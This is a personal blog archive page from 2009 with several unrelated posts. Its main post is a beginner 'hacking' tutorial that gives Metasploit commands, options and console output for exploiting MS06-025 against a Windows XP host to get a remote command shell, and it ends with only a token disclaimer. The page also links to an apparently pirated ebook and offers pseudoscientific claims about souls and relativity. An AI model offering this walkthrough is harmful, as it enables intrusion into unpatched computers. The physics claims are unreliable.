A day without a perdurable is like a day without sunshine

Saturday, November 7, 2009

A day without a perdurable is like a day without sunshine


Hacking for Beginners seriers: Hacking Windows XP

Wednesday, July 8, 2009

Welcome to the Hacking for Beginners Series. Tried to become a hacker and did not know where to begin? You've come to the right place...
So Now we set up your hacker PC. I call it so because this computer is gonna be your battlefield where you shall learn the art of hacking and maybe ( if you want to ) become a great hacker.

So first you need to download metasploit.
Now what the hell is that? ( You'd Probably say )
Well it is a free downloadable tool that makes hacking ( preliminary ) easy as a cake.
You should download the windows installer here.

So now you've downloaded the file, what next?
Install it....
Now you've got a metasploit on your start menu.
Find the msfconsole.
Click on it.
You will see something like this:
















now type show exploits
You'll see something like the one below. Actually metasploit has exploits written into it. These are the vulnerabilities already found out by the makers.
















Now we have to find the RRAS exploit. It is called ms06_025_rras
Now we type in:
msf > use ms06_025_rras
msf exploit(ms06_025_rras) >
Notice how the prompt changes and becomes something like the above line.

Different exploits have different options. Now we setup the exploit options.
Type in show options and you'll see something like this:


msf exploit(ms06_025_rras) > show options
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE ROUTER yes The pipe name to use (ROUTER, SRVSVC)


This exploit requires a target address, the port number SMB (server message block)
uses to listen, and the name of the pipe exposing this functionality.

msf exploit(ms06_025_rras) > set RHOST 192.168.1.220
RHOST => 192.168.1.220

The payload:
This is the thing that metasploit does after you've hacked the computer.
So we load a payload now into the exploit. We type in show payloads.

msf exploit(ms06_025_rras) > show payloads
Compatible payloads
===================
...
windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw Windows Disable Windows ICF, Command
Shell, Bind TCP Inline
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP
Inline
...

We will use the bind shell. This will give access to all operation on the PC. You must've seen command prompt ( the DOS thingy ).
So type in :
msf exploit(ms06_025_rras) > set PAYLOAD shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp

Then again we need to setup the options for the payload.
msf exploit(ms06_025_rras) > show options

Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.220 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE ROUTER yes The pipe name to use (ROUTER, SRVSVC)
Payload options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port

Everything set:

The exploit and payload are both set. Next we need to set a target type.Metasploit has
some generic exploits that work on all platforms, but for others you’ll need to specify a
target operating system.

msf exploit(ms06_025_rras) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 2000 SP4
1 Windows XP SP1
msf exploit(ms06_025_rras) > set TARGET 1
TARGET => 1

You have set the target.
Lets kickstart the exploit!!!
msf exploit(ms06_025_rras) > exploit
msf auxiliary(pipe_auditor) > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) > set SMBPIPE SRVSVC
SMBPIPE => SRVSVC
msf exploit(ms06_025_rras) > exploit
[*] Started bind handler
[*] Binding to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_
np:192.168.1.220[\SRVSVC] ...
[*] Bound to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_
np:192.168.1.220[\SRVSVC] ...
[*] Getting OS...
[*] Calling the vulnerable function on Windows XP...
[*] Command shell session 1 opened (192.168.1.113:2347 -> 192.168.1.220:4444)


Here is the command prompt below of the hacked system. You can now delete , copy files or do anything with it......


Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\SAFE_NT\system32>echo w00t!
echo w00t!
w00t!
D:\SAFE_NT\system32>

Safe hacking!!!

Warning : The above article is for educational purposes only. Use it at your own risk. The author is not responsible for any damage whatsoever casued by its use.


CodeIgniter for Rapid PHP Application Development by David Upton

Sunday, May 11, 2008

I started reading "CodeIgniter for Rapid PHP Application Development" as a novice. This book is specially targeted to anybody like me: little or no prior experience of Object Oriented Programming or the MVC approach, with couple of years procedural PHP experience, and is after something that can really take you to the next level.

I have prior experience of 2 years using Dreamweaver to build Web applications for my current employer. Dreamweaver uses a procedural approach to PHP, whereas CodeIgniter focuses on Object Oriented Programming (OOP). If you have not done any OOP before, then this book provides a good introduction.

CodeIgniter is a PHP framework that allows you to build clean and sophisticated applications using an MVC (Model View Control) approach.

Putting it in simple terms, an MVC approach provides a clean way to organise your code. Once you understand the concept and become familiar with the CodeIgniter framework, you will be building Web applications in no time.

The book was published by Packt Publishing. Like with all their books, you can download the example code from their support page. The examples are pretty easy to setup. I had no problems getting any of them to work. The details and explanations provided by the author make it very difficult to make a mistake.

The introduction was for me the hardest part to get through, as I had no prior experience with OOP, nor with the MVC approach.

I am a more hands on programmer. I learn from writing the code rather than reading about the methods. So when the book starts explaining how to use CodeIgniter to simplify common tasks, I started realizing how and why my application design would improve. This book was not just about CodeIgniter, but a new approach to efficient application development with all the hard work already done.

After you are introduced to the MVC approach, chapters are broken down into common tasks. It starts looking at how CodeIgniter works with database connections, while keeping the application code clean and writing less code.

Initially I thought it was reinventing the wheel, making me learn a new syntax to achieve the same results. However, over time, you find the application development with CodeIgniter is a lot easier because it is simple, especially when it comes to troubleshooting. You are working with a much stronger and efficient foundation when compared to not using any framework.

In the middle of the book we get a look under the hood, i.e. how CodeIgniter actually works. You will still want to write your own application classes. Here we can see how we can integrate them with CodeIgniter. Being new to OOP, I just gave a brief overview over this section, as it focused very much on the CodeIgniter "super-object", which is the root of the framework.

You may have heard about "Test Driven Development". In a nutshell, it focuses on creating a test environment before you even start writing your production code.

The idea is that you build your application and code to pass these predefined tests. It is difficult a concept to swallow initial, so I welcomed the chapter that helps understanding this approach to application design.

Once we have tested our application and we are happy with the functionality, how can we ensure we have not ended up with slow code? Easy! David Upton, the author, shows how we can easily benchmark our application using a CodeIgniter class.

Benchmarking is not always required. Smaller projects may not benefit much from speed improvements of just a fraction of a second. But if you are building an enterprise class application, optimization can make all the difference.

The CodeIgniter framework offers a lot of productivity to PHP Web developers.

The greatest benefit of buying this book is that we gain a practical understanding of where and how we can use CodeIgniter.

I have only scratched the surface of what is offered by the author. He tutors you on each section, explaining the concepts behind each CodeIgniter class or helper.

You are not overwhelmed with code, but taught valuable lessons about the MVC approach and Web application development.

Well a seemingly unauthorized version of this book has been hosted by DBEBOOKS. But if you really wan to see it here is the link

Dbebooks.in - CodeIgniter for Rapid PHP Application Development



Signing off,
Guru


After-Life question

Thursday, May 1, 2008

Question:  Oneday everyone meet death, 90% of people belive a life after death, What about you?



Answer:

the soul that comes out from he body after death has no weight, volume,mass etc. It exists in another space-time dimension ( spl. theory of relativity). Everything including souls have consiousness but in different space-time arrangements. Even the souls will consider us as non-living things because they cannot percieve us through their sense organs. Just read einstien's spl. theory of relativity. you'll understand all well.


Do you have any experiences about spirituality? I have many miraculous things happening to me..

Question : Do you have any experiences about spirituality? I have many miraculous things happening to me..

Answer:
We can take it in two parts: the god thing and the physics world. Believe in anything but it works out fine. Even if God exists it works in total harmony with nature. All experiences are just either hallucinations or extended use of the sense organs. Nothing more. The concept of vibrations as telepathic carriers can also be a reason to these spiritual phenomena.


Sedan

Tuesday, April 8, 2008

n a livin dog is better than a dead lion,
have stolled the streets with moes in oblivion,
got bitches under ma dick
the day's great,
got nothing to eat , leave maself to fate,
in a dingy cell, or under the church bell,
i can see those humans hurdling,
feel like murdering,
all of those two legged ones,
n' stuffing maself up witheir bums,
so i'll have their bums first,
drink their blood
to quench ma thirst,
lick on to some boobs,
then eat em' whole tooo,
well ma wish didn't come true,
in my deathbed i moo like a cow,
instead of the regular bow wow,
working up my past,
i lay there till the last,
waiting for the dog pound workers top blast
me up,
and set up,
an incinerator to burn me up.
my souls alive , i gotta say,
i am puzzled for now,
but some day,
i'll come back to eat you all up,
so whass up ???


Jail Bird -I

m a lean dog, a keen dog, a wild dog,n lone,
m a rough dog , tough dog , hunting on my own,
m a bad dog , a mad dog, teasing silly sheep,
i love to sit n bay the moon, to keep fat souls from sleep...........

n a livin dog is better than a dead loin............


Aspiring Teens : money music love. 2008 One Winged Angel.Bloggerized by : GosuBlogger